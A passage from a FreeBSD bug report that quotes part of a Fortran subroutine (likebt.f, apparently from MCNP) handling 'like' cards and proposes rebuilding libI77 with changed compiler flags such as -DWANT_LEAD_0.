what is wrong, I attach a small portion of the subroutine likebt.f. c if(mm.eq.2)go to 150 c c when "like" is seen, remove the card from iu1. if(nwc.eq.3)return if(nwc.ne.1)go to 10 likef=1 mxa=mxa-1 backspace iu1 call nxtsym(klin,' ',1,it,iu,1) if(klin(it:iu).eq.'like')backspace iu1 endfile iu1 return c c get the material and density and copy the geometry of cell "m". 10 if(nwc.ne.2)go to 120 do 20 nc=1,mxa 20 if(mod(ncl(lncl+nc),100000).eq.iitm)go to 30 go to 110 30 ncl(lncl+mxa+1)=ncl(lncl+mxa+1)+100000*(ncl(lncl+nc)/100000) rewind iu2 rewind iu1 do 50 i=1,nc 40 read(iu1,'(a5,a80)')ht1,hl1 50 if(ht1(1:1).eq.'&')go to 40 ipp=4 nw=0 hl2=' ' call nxtsym(hl1,' ',1,it,iu,1) go to 80 60 read(iu1,'(a5,a80)',end=110)ht1,hl1 if(ht1(1:1).ne.'&')go to 100 iu=0 80 call nxtsym(hl1,' ():#$&',iu+1,itl,iu,1) if(iu.eq.0)go to 60 if(hl1(itl:itl).eq.'$'.or.hl1(itl:itl).eq.'&')go to 60 nw=nw+1 hh=hl1(itl:iu) if(nw.eq.1)read(hh,'(bn,i30)')mats if(nw.eq.2.and.mats.ne.0)read(hh,'(bn,e30.0)')rhos if(nw.eq.1.or.nw.eq.2.and.mats.ne.0)go to 80 k=index('():#',hh(1:1)) ki=kdata(hh) if(k.eq.0.and.ki.eq.0)return if(k.eq.4)ncomp=ncomp+1 if(ipp+2+iu-itl.le.80)go to 90 write(iu2,'(a80)')hl2 ipp=4 hl2=' ' 90 hl2(ipp+2:ipp+2+iu-itl)=hh ipp=ipp+2+iu-itl go to 80 100 itl=-1 return 110 itl=-2 return c c copy the exceptions onto iu2. 120 if(hitm.eq.'=')return if(likef.ne.1)go to 140 if(hitm.eq.'mat')likef=2 if(hitm.eq.'rho')likef=3 if(likef.ne.1)return n=0 if(hitm.ne.':'.and.hl2(ipp:ipp).ne.':')n=1 if(ipp+3+nitm.le.60.or.n.eq.0)go to 130 write(iu2,'(a80)')hl2 ipp=4 hl2=' ' 130 hl2(ipp+n+1:ipp+n+nitm)=hitm ipp=ipp+n+nitm return c c save mat or rho values. 140 if(likef.eq.2)mats=iitm if(likef.eq.3)rhos=ritm likef=1 return c c when the "like" card is all read, finish the expanded card. 150 if(nwc.lt.2)go to 210 backspace iui c c copy any cell parameters of cell "m". if(itl.eq.-2)go to 200 if(itl.eq.-1)go to 190 iu=itl-1 go to 170 160 read(iu1,'(a5,a80)',end=200)ht1,hl1 if(ht1(1:1).ne.'&')go to 190 iu=0 170 call nxtsym(hl1,' ()#$&',iu+1,itl,iu,1) if(iu.eq.0)go to 160 if(hl1(itl:itl).eq.'$')go to 160 if(ipp+4+iu-itl.le.80)go to 180 write(iu2,'(a80)')hl2 ipp=4 hl2=' ' 180 hl2(ipp+2:ipp+2+iu-itl)=hl1(itl:iu) ipp=ipp+2+iu-itl go to 170 c c skip over the rest of iu1. 190 read(iu1,'(a5,a80)',end=200)ht1,hl1 go to 190 200 backspace iu1 c c get ready to read the expanded card from iu2. write(iu2,'(a80)')hl2 endfile iu2 rewind iu2 jui=iu2 write(hlin,'(i5,i6)')icn,mats if(mats.ne.0)write(hlin(13:33),'(e21.14)')rhos 210 likef=0 return end >Fix: Recompile libI77 under /usr/src/lib/libI77 with the Makefile in /usr/src/libf2c with the -DNON_ANSI_RW_MODES removed from the CFLAG. I believe the problem is wrong configuration of libI77. I would also like to ask you if you can put -DWANT_LEAD_0 in the CFLAG. The reason is a lot of FORTRAN compilers (e.g. from SUN, DEC, SGI, ...) have a leading zero for decimal number smaller than 1. I am pretty sure MCNP is working probably because it can be compiled under many machines. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message